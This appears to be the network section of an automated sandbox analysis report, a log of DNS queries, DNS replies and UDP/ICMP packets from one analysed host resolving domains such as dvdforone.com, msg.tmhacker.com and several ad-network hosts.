Aug 29, 2024 17:12:14.931216002 CEST | 59054 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:14.944226980 CEST | 53 | 56681 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:14.945142984 CEST | 53 | 59054 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.159794092 CEST | 53 | 52181 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.346203089 CEST | 59953 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.353899956 CEST | 53 | 59953 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.764729023 CEST | 56225 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.764920950 CEST | 51575 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.765275955 CEST | 50688 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.765399933 CEST | 50361 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.765850067 CEST | 50117 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.766103983 CEST | 62143 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:15.771605015 CEST | 53 | 56225 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.771625996 CEST | 53 | 51575 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.771872997 CEST | 53 | 50688 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:15.772713900 CEST | 53 | 50361 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.341173887 CEST | 58729 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.341335058 CEST | 63101 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.420237064 CEST | 53 | 58729 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.420550108 CEST | 53 | 63101 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.472395897 CEST | 56926 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.472742081 CEST | 54128 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.473582029 CEST | 54278 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.473762989 CEST | 63718 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:17.479425907 CEST | 53 | 56926 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.481298923 CEST | 53 | 54128 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.481981993 CEST | 53 | 63718 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:17.482273102 CEST | 53 | 54278 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.055983067 CEST | 60705 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.057051897 CEST | 55525 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.059462070 CEST | 63112 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.059663057 CEST | 62624 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.062526941 CEST | 53 | 60705 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.064054966 CEST | 53 | 55525 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.066381931 CEST | 53 | 62624 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.066971064 CEST | 53 | 63112 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.365657091 CEST | 52133 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.365761995 CEST | 51134 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:18.372340918 CEST | 53 | 52133 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:18.372389078 CEST | 53 | 51134 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:19.276772022 CEST | 59308 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:19.277312040 CEST | 51395 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:19.295773983 CEST | 53 | 59308 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:19.295789003 CEST | 53 | 51395 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.456661940 CEST | 50670 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.456815958 CEST | 58312 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.459553957 CEST | 58052 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.459781885 CEST | 50483 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.463551044 CEST | 53 | 58312 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.464247942 CEST | 53 | 50670 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.466523886 CEST | 53 | 50483 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.466562986 CEST | 53 | 58052 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.482933044 CEST | 63906 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.483064890 CEST | 63186 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.896522999 CEST | 60640 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.896697044 CEST | 55733 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:20.903687000 CEST | 53 | 60640 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:20.904326916 CEST | 53 | 55733 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:21.132491112 CEST | 53597 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:21.132661104 CEST | 52719 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:21.143326998 CEST | 53 | 52719 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:21.152234077 CEST | 53 | 53597 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:22.608262062 CEST | 59412 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:22.608814955 CEST | 50973 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:22.619158030 CEST | 53 | 59412 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:22.619266033 CEST | 53 | 50973 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:23.623505116 CEST | 65298 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:23.623783112 CEST | 49957 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:23.908694983 CEST | 53 | 65298 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:23.908706903 CEST | 53 | 49957 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:24.065898895 CEST | 53257 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:24.066342115 CEST | 64402 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:24.073435068 CEST | 53 | 53257 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:24.074997902 CEST | 53 | 64402 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:26.018728018 CEST | 62458 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:26.018879890 CEST | 64281 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:26.026874065 CEST | 53 | 62458 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:26.027375937 CEST | 53 | 64281 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:28.232295990 CEST | 53908 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:28.404875994 CEST | 53 | 53908 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:28.578124046 CEST | 56339 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:28.787944078 CEST | 53 | 56339 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:29.666058064 CEST | 60680 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:29.666214943 CEST | 64395 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:29.675889015 CEST | 53 | 64395 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:29.839440107 CEST | 53 | 60680 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:29.847732067 CEST | 64529 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:29.857098103 CEST | 53 | 64529 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:30.151204109 CEST | 52958 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:30.151901960 CEST | 56762 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:30.208724976 CEST | 53 | 52958 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:30.208878040 CEST | 53 | 56762 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:30.397177935 CEST | 49378 | 53 | 192.168.2.5 | 8.8.8.8
Aug 29, 2024 17:12:30.397434950 CEST | 64126 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:30.617733955 CEST | 53 | 64126 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:30.617774963 CEST | 53 | 49378 | 8.8.8.8 | 192.168.2.5
Aug 29, 2024 17:12:31.583036900 CEST | 52569 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:31.583197117 CEST | 64143 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:31.590953112 CEST | 53 | 64143 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:31.593971968 CEST | 53 | 52569 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:32.178540945 CEST | 53 | 58203 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:36.633745909 CEST | 56907 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:36.634052038 CEST | 62739 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:36.665052891 CEST | 53 | 56907 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:36.680179119 CEST | 65422 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:36.690865040 CEST | 53 | 65422 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:36.796798944 CEST | 53 | 62739 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:50.971236944 CEST | 53 | 53586 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:06.043868065 CEST | 52836 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:13:06.053914070 CEST | 53 | 52836 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:06.703795910 CEST | 51864 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:13:06.703931093 CEST | 52213 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:13:07.172674894 CEST | 53 | 51864 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:07.231280088 CEST | 49269 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:13:07.245523930 CEST | 53 | 49269 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:07.307838917 CEST | 53 | 52213 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:13.378654003 CEST | 53 | 59374 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:13.645889044 CEST | 53 | 52850 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:26.714133024 CEST | 59552 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:13:26.726206064 CEST | 53 | 59552 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:13:41.754156113 CEST | 53 | 62322 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:14:07.266853094 CEST | 50042 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:14:07.267029047 CEST | 50116 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:14:07.277966976 CEST | 53 | 50116 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:14:07.278088093 CEST | 53 | 50042 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:14:07.278671980 CEST | 64672 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:14:07.309833050 CEST | 53 | 64672 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Aug 29, 2024 17:12:36.796895981 CEST | 192.168.2.5 | 1.1.1.1 | c231 | (Port unreachable) | Destination Unreachable
Aug 29, 2024 17:13:07.307929039 CEST | 192.168.2.5 | 1.1.1.1 | c231 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 17:12:10.960086107 CEST | 192.168.2.5 | 1.1.1.1 | 0xcb00 | Standard query (0) | 1861119.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.046870947 CEST | 192.168.2.5 | 1.1.1.1 | 0x5fca | Standard query (0) | www.onefordvd.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.047013998 CEST | 192.168.2.5 | 1.1.1.1 | 0x668f | Standard query (0) | www.onefordvd.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:14.931062937 CEST | 192.168.2.5 | 1.1.1.1 | 0xcc6a | Standard query (0) | www.onefordvd.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.931216002 CEST | 192.168.2.5 | 1.1.1.1 | 0x510f | Standard query (0) | www.onefordvd.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:15.346203089 CEST | 192.168.2.5 | 1.1.1.1 | 0x8cab | Standard query (0) | msg.tmhacker.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.366192102 CEST | 192.168.2.5 | 1.1.1.1 | 0x1 | Standard query (0) | msg.tmhacker.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.764729023 CEST | 192.168.2.5 | 1.1.1.1 | 0x7f38 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.764920950 CEST | 192.168.2.5 | 1.1.1.1 | 0x97f8 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:15.765275955 CEST | 192.168.2.5 | 1.1.1.1 | 0x239b | Standard query (0) | btloader.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.765399933 CEST | 192.168.2.5 | 1.1.1.1 | 0x9180 | Standard query (0) | btloader.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:15.765850067 CEST | 192.168.2.5 | 1.1.1.1 | 0x3bd2 | Standard query (0) | img1.wsimg.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.766103983 CEST | 192.168.2.5 | 1.1.1.1 | 0x2591 | Standard query (0) | img1.wsimg.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:17.341173887 CEST | 192.168.2.5 | 1.1.1.1 | 0xb210 | Standard query (0) | syndicatedsearch.goog | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.341335058 CEST | 192.168.2.5 | 1.1.1.1 | 0x5946 | Standard query (0) | syndicatedsearch.goog | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:17.472395897 CEST | 192.168.2.5 | 1.1.1.1 | 0x4809 | Standard query (0) | ad-delivery.net | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.472742081 CEST | 192.168.2.5 | 1.1.1.1 | 0x3ed9 | Standard query (0) | ad-delivery.net | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:17.473582029 CEST | 192.168.2.5 | 1.1.1.1 | 0x2ffa | Standard query (0) | ad.doubleclick.net | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.473762989 CEST | 192.168.2.5 | 1.1.1.1 | 0xb4d6 | Standard query (0) | ad.doubleclick.net | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:18.055983067 CEST | 192.168.2.5 | 1.1.1.1 | 0x1a6 | Standard query (0) | btloader.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.057051897 CEST | 192.168.2.5 | 1.1.1.1 | 0x2624 | Standard query (0) | btloader.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:18.059462070 CEST | 192.168.2.5 | 1.1.1.1 | 0xdbfd | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.059663057 CEST | 192.168.2.5 | 1.1.1.1 | 0x2bef | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:18.365657091 CEST | 192.168.2.5 | 1.1.1.1 | 0x6d4c | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.365761995 CEST | 192.168.2.5 | 1.1.1.1 | 0x21b4 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:19.276772022 CEST | 192.168.2.5 | 1.1.1.1 | 0x1f10 | Standard query (0) | api.aws.parking.godaddy.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:19.277312040 CEST | 192.168.2.5 | 1.1.1.1 | 0xf57f | Standard query (0) | api.aws.parking.godaddy.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.456661940 CEST | 192.168.2.5 | 1.1.1.1 | 0xf53b | Standard query (0) | ad-delivery.net | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.456815958 CEST | 192.168.2.5 | 1.1.1.1 | 0xc22b | Standard query (0) | ad-delivery.net | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.459553957 CEST | 192.168.2.5 | 1.1.1.1 | 0x7de3 | Standard query (0) | ad.doubleclick.net | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.459781885 CEST | 192.168.2.5 | 1.1.1.1 | 0x1fac | Standard query (0) | ad.doubleclick.net | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.482933044 CEST | 192.168.2.5 | 1.1.1.1 | 0x241e | Standard query (0) | img1.wsimg.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.483064890 CEST | 192.168.2.5 | 1.1.1.1 | 0x42b8 | Standard query (0) | img1.wsimg.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:20.896522999 CEST | 192.168.2.5 | 1.1.1.1 | 0x2ae7 | Standard query (0) | syndicatedsearch.goog | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:20.896697044 CEST | 192.168.2.5 | 1.1.1.1 | 0xf8ba | Standard query (0) | syndicatedsearch.goog | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:21.132491112 CEST | 192.168.2.5 | 1.1.1.1 | 0x733d | Standard query (0) | api.aws.parking.godaddy.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:21.132661104 CEST | 192.168.2.5 | 1.1.1.1 | 0xbf99 | Standard query (0) | api.aws.parking.godaddy.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:22.608262062 CEST | 192.168.2.5 | 1.1.1.1 | 0x495a | Standard query (0) | afs.googleusercontent.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:22.608814955 CEST | 192.168.2.5 | 1.1.1.1 | 0xd20d | Standard query (0) | afs.googleusercontent.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:23.623505116 CEST | 192.168.2.5 | 1.1.1.1 | 0xf92f | Standard query (0) | syndicatedsearch.goog | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:23.623783112 CEST | 192.168.2.5 | 1.1.1.1 | 0x1329 | Standard query (0) | syndicatedsearch.goog | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:24.065898895 CEST | 192.168.2.5 | 1.1.1.1 | 0xc2a2 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:24.066342115 CEST | 192.168.2.5 | 1.1.1.1 | 0xf54f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:26.018728018 CEST | 192.168.2.5 | 1.1.1.1 | 0x2224 | Standard query (0) | afs.googleusercontent.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:26.018879890 CEST | 192.168.2.5 | 1.1.1.1 | 0x503d | Standard query (0) | afs.googleusercontent.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:28.232295990 CEST | 192.168.2.5 | 1.1.1.1 | 0x699a | Standard query (0) | 1861119.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:28.578124046 CEST | 192.168.2.5 | 1.1.1.1 | 0xaad5 | Standard query (0) | msg.tmhacker.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:29.666058064 CEST | 192.168.2.5 | 1.1.1.1 | 0xe3e7 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:29.666214943 CEST | 192.168.2.5 | 1.1.1.1 | 0x8c74 | Standard query (0) | www.dvdforone.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:29.847732067 CEST | 192.168.2.5 | 1.1.1.1 | 0xa928 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.151204109 CEST | 192.168.2.5 | 1.1.1.1 | 0xb269 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.151901960 CEST | 192.168.2.5 | 1.1.1.1 | 0x2b9f | Standard query (0) | www.dvdforone.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:30.397177935 CEST | 192.168.2.5 | 8.8.8.8 | 0x4aad | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:30.397434950 CEST | 192.168.2.5 | 1.1.1.1 | 0xe32e | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:31.583036900 CEST | 192.168.2.5 | 1.1.1.1 | 0xb4be | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:31.583197117 CEST | 192.168.2.5 | 1.1.1.1 | 0x35b6 | Standard query (0) | www.dvdforone.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:36.633745909 CEST | 192.168.2.5 | 1.1.1.1 | 0xecde | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:36.634052038 CEST | 192.168.2.5 | 1.1.1.1 | 0x7d8 | Standard query (0) | www.dvdforone.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:36.680179119 CEST | 192.168.2.5 | 1.1.1.1 | 0x114b | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:06.043868065 CEST | 192.168.2.5 | 1.1.1.1 | 0x31f7 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:06.703795910 CEST | 192.168.2.5 | 1.1.1.1 | 0x6274 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:06.703931093 CEST | 192.168.2.5 | 1.1.1.1 | 0x3c4f | Standard query (0) | www.dvdforone.com | 65 | IN (0x0001) | false
Aug 29, 2024 17:13:07.231280088 CEST | 192.168.2.5 | 1.1.1.1 | 0xf7f0 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:13:26.714133024 CEST | 192.168.2.5 | 1.1.1.1 | 0xe02 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:14:07.266853094 CEST | 192.168.2.5 | 1.1.1.1 | 0xea09 | Standard query (0) | www.dvdforone.com | A (IP address) | IN (0x0001) | false
                                                                          Aug 29, 2024 17:14:07.267029047 CEST192.168.2.51.1.1.10x1983Standard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.278671980 CEST192.168.2.51.1.1.10xc977Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 17:12:10.992037058 CEST | 1.1.1.1 | 192.168.2.5 | 0xcb00 | Name error (3) | 1861119.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.230212927 CEST | 1.1.1.1 | 192.168.2.5 | 0x5fca | No error (0) | www.onefordvd.com | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.230212927 CEST | 1.1.1.1 | 192.168.2.5 | 0x5fca | No error (0) | www.onefordvd.com | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.944226980 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc6a | No error (0) | www.onefordvd.com | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:14.944226980 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc6a | No error (0) | www.onefordvd.com | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.771605015 CEST | 1.1.1.1 | 192.168.2.5 | 0x7f38 | No error (0) | www.google.com | | 142.250.186.68 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.771625996 CEST | 1.1.1.1 | 192.168.2.5 | 0x97f8 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:15.771872997 CEST | 1.1.1.1 | 192.168.2.5 | 0x239b | No error (0) | btloader.com | | 172.67.41.60 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.771872997 CEST | 1.1.1.1 | 192.168.2.5 | 0x239b | No error (0) | btloader.com | | 104.22.75.216 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.771872997 CEST | 1.1.1.1 | 192.168.2.5 | 0x239b | No error (0) | btloader.com | | 104.22.74.216 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:15.772713900 CEST | 1.1.1.1 | 192.168.2.5 | 0x9180 | No error (0) | btloader.com | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:15.777225018 CEST | 1.1.1.1 | 192.168.2.5 | 0x2591 | No error (0) | img1.wsimg.com | global-wildcard.wsimg.com.sni-only.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:15.779580116 CEST | 1.1.1.1 | 192.168.2.5 | 0x3bd2 | No error (0) | img1.wsimg.com | global-wildcard.wsimg.com.sni-only.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 29, 2024 17:12:15.835113049 CEST | 1.1.1.1 | 192.168.2.5 | 0x1 | Name error (3) | msg.tmhacker.com | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.420237064 CEST | 1.1.1.1 | 192.168.2.5 | 0xb210 | No error (0) | syndicatedsearch.goog | | 172.217.16.206 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.479425907 CEST | 1.1.1.1 | 192.168.2.5 | 0x4809 | No error (0) | ad-delivery.net | | 172.67.69.19 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.479425907 CEST | 1.1.1.1 | 192.168.2.5 | 0x4809 | No error (0) | ad-delivery.net | | 104.26.2.70 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.479425907 CEST | 1.1.1.1 | 192.168.2.5 | 0x4809 | No error (0) | ad-delivery.net | | 104.26.3.70 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:17.481298923 CEST | 1.1.1.1 | 192.168.2.5 | 0x3ed9 | No error (0) | ad-delivery.net | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:17.481981993 CEST | 1.1.1.1 | 192.168.2.5 | 0xb4d6 | No error (0) | ad.doubleclick.net | | | 65 | IN (0x0001) | false
Aug 29, 2024 17:12:17.482273102 CEST | 1.1.1.1 | 192.168.2.5 | 0x2ffa | No error (0) | ad.doubleclick.net | | 216.58.206.38 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.062526941 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a6 | No error (0) | btloader.com | | 172.67.41.60 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.062526941 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a6 | No error (0) | btloader.com | | 104.22.74.216 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.062526941 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a6 | No error (0) | btloader.com | | 104.22.75.216 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 17:12:18.064054966 CEST | 1.1.1.1 | 192.168.2.5 | 0x2624 | No error (0) | btloader.com | | | 65 | IN (0x0001) | false
